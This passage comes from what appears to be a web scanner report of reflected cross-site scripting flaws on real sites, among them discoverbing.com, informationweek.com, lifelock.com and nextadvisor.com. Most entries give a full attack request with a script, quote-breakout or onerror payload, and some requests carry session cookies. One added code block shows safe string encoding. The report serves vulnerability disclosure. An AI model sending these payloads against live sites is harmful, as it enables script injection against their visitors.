GET /Activities/BePrepared?30806"><script>alert(1)</script>02794a1d94=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569649149; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BePrepared?30806"><script>alert(1)</script>02794a1d94=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.49. http://www.discoverbing.com/Activities/FindFlights [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /Activities/FindFlights
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d0db"><script>alert(1)</script>68fb85687a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/FindFlights?3d0db"><script>alert(1)</script>68fb85687a8=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569642930; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/FindFlights?3d0db"><script>alert(1)</script>68fb85687a8=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.50. http://www.discoverbing.com/Activities/MakeLocalPlans [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /Activities/MakeLocalPlans
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0f1f"><script>alert(1)</script>2357e1c84b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/MakeLocalPlans?e0f1f"><script>alert(1)</script>2357e1c84b7=1 HTTP/1.1 Host: www.discoverbing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569651293; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/MakeLocalPlans?e0f1f"><script>alert(1)</script>2357e1c84b7=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank"> ...[SNIP]...
2.51. http://www.discoverbing.com/Activities/SocialSearch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /Activities/SocialSearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7223"><script>alert(1)</script>485a36705a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Activities/SocialSearch?b7223"><script>alert(1)</script>485a36705a7=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/SocialSearch?b7223"><script>alert(1)</script>485a36705a7=1&fbshare=true&t=Look+what+I+discovered+on+Bing" target="_blank">
...[SNIP]...
2.52. http://www.discoverbing.com/facebook [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.discoverbing.com
Path: /facebook
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84344"><script>alert(1)</script>8123e66d22e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /facebook?84344"><script>alert(1)</script>8123e66d22e=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfae"-alert(1)-"ff46e1e7966 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9dfae"-alert(1)-"ff46e1e7966?_=1303613718975&redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
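The script-context finding above, as an added example that is not part of the scanner report: a hypothetical server-side template drops a request value between the quotes of a JavaScript string literal, the two breakout shapes the report uses ("-alert(1)-" and ';alert(1)//) are run through it, and a safe string-literal encoder is applied for comparison. The template, the function names and the alert() stub are assumptions for illustration; the payload markers are constructed to match the report's shape.

```javascript
// Added example, not taken from the scanner report. It models the finding
// "value copied into a JavaScript string encapsulated in quotation marks" with a
// hypothetical server-side template and shows how to emit the value safely.

// Naive template: the reflected value is dropped between quotes unmodified.
// `quote` is the delimiter the page puts around the literal ('"' or "'").
function naiveTemplate(value, quote) {
  return 'var page = ' + quote + value + quote + ';';
}

// Safe JavaScript string literal: JSON.stringify escapes quotes, backslashes and
// control characters. The extra substitutions stop the literal from closing the
// surrounding <script> element (a </script> inside the literal is an HTML-level
// breakout the JS engine never sees) and from breaking on U+2028/U+2029.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function safeTemplate(value) {
  return 'var page = ' + jsStringLiteral(value) + ';';
}

// Runs the generated statement with an alert() stub that records whether it was
// called. Returns { fired, page }: did the payload execute, and what value did the
// script actually end up holding.
function runScript(script) {
  let fired = false;
  const alert = () => { fired = true; return 0; };
  // `return` goes on its own line so a // comment in the payload cannot swallow it.
  const page = new Function('alert', script + '\nreturn page;')(alert);
  return { fired, page };
}

// Constructed payloads with the same shape as the report's (marker + breakout + marker).
const payloads = {
  doubleQuoteBreakout: '9dfae"-alert(1)-"ff46e1e7966',
  singleQuoteBreakout: "cbd2b';alert(1)//b3ccf1b55bd",
  // Only the HTML parser would act on this one; it is here to show the encoder
  // neutralises '<' and '>' as well, so the literal can never end the script block.
  scriptClose: '</script><script>alert(1)</script>',
};

// Evaluate every payload under both templates, choosing the naive template's
// delimiter to match the quote style the payload targets.
function compare() {
  const out = {};
  for (const [name, p] of Object.entries(payloads)) {
    const quote = p.includes("'") ? "'" : '"';
    out[name] = {
      naive: runScript(naiveTemplate(p, quote)),
      safe: runScript(safeTemplate(p)),
    };
  }
  return out;
}
```

Under the naive template the double-quote payload evaluates as "9dfae" - alert(1) - "ff46e1e7966" and the single-quote payload terminates the statement, calls alert(1) and comments out the rest of the line; under the safe template both come back as the original string with alert() never called. Encoding the literal is the fallback; the remediation text's first recommendation still applies: keep user data out of script context altogether, for example by placing it in an HTML attribute or a JSON block and reading it from there.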
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613bc"><script>alert(1)</script>5ef418a1482 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /613bc"><script>alert(1)</script>5ef418a1482?_=1303613718975&redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5818f"><script>alert(1)</script>904650c8cb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12d21"-alert(1)-"821c5415bb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fccb4'-alert(1)-'124152fd938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcefe"><script>alert(1)</script>fe5ee48cf1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5608"-alert(1)-"9829f497abd840a41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd82"><script>alert(1)</script>d594c72fda68b16a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a06c"><script>alert(1)</script>3049035ccd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f343'-alert(1)-'aacdbbd961676d23c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 366bd"-alert(1)-"ffc1f1a20a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news366bd"-alert(1)-"ffc1f1a20a6/security/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ee7"><script>alert(1)</script>dd771e651e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsb4ee7"><script>alert(1)</script>dd771e651e7/security/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbd2b'%3balert(1)//b3ccf1b55bd was submitted in the REST URL parameter 2. This input was echoed as cbd2b';alert(1)//b3ccf1b55bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/securitycbd2b'%3balert(1)//b3ccf1b55bd/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d09f"><script>alert(1)</script>4c2297b99c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security4d09f"><script>alert(1)</script>4c2297b99c1/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e0b"><script>alert(1)</script>572ee684acc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/attacks24e0b"><script>alert(1)</script>572ee684acc/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
s_button_stumbleupon at300b" href="http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=InformationWeek&source=tbx-250&lng=en-US&s=stumbleupon&url=www.informationweek.com/news/security/attacks24e0b"><script>alert(1)</script>572ee684acc/229402094&title=Hacking Becomes Leading Cause Of Data Breaches -- InformationWeek&ate=AT-InformationWeek/-/-/4d22a657185bdbc2/1&sms_ss=1&at_xt=1&CXNID=2000001.5215456080540439074NXC&pre=www.informatio
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4de'%3balert(1)//79f1e066e0e was submitted in the REST URL parameter 3. This input was echoed as 2a4de';alert(1)//79f1e066e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/attacks2a4de'%3balert(1)//79f1e066e0e/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1866f'-alert(1)-'296c5fdde43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/attacks/2294020941866f'-alert(1)-'296c5fdde43 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92353"><a>cdbf7e70e0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/security/attacks/22940209492353"><a>cdbf7e70e0d HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e581"><script>alert(1)</script>1b0afbbb73d was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?promocode=GOOGSEARCH135e581"><script>alert(1)</script>1b0afbbb73d&c3metrics=3114&gclid=CNG9kumTtKgCFUNd5Qod6WW7Cw HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0912"><img%20src%3da%20onerror%3dalert(1)>1155d91a54e was submitted in the REST URL parameter 1. This input was echoed as e0912"><img src=a onerror=alert(1)>1155d91a54e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index.phpe0912"><img%20src%3da%20onerror%3dalert(1)>1155d91a54e HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 14:27:40 GMT
Server: Apache
Set-Cookie: wongsess=65fa81b50439e24c66611f40a38c133b; expires=Tue, 22-Apr-2036 20:27:40 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 5168
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b33a"><script>alert(1)</script>b562ccaade5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /identity_theft_protection_services9b33a"><script>alert(1)</script>b562ccaade5/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5c82'><img%20src%3da%20onerror%3dalert(1)>795db6ed304 was submitted in the REST URL parameter 1. This input was echoed as b5c82'><img src=a onerror=alert(1)>795db6ed304 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /identity_theft_protection_servicesb5c82'><img%20src%3da%20onerror%3dalert(1)>795db6ed304/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c97f9"><script>alert(1)</script>806bcf582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /identity_theft_protection_services/index.phpc97f9"><script>alert(1)</script>806bcf582e?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
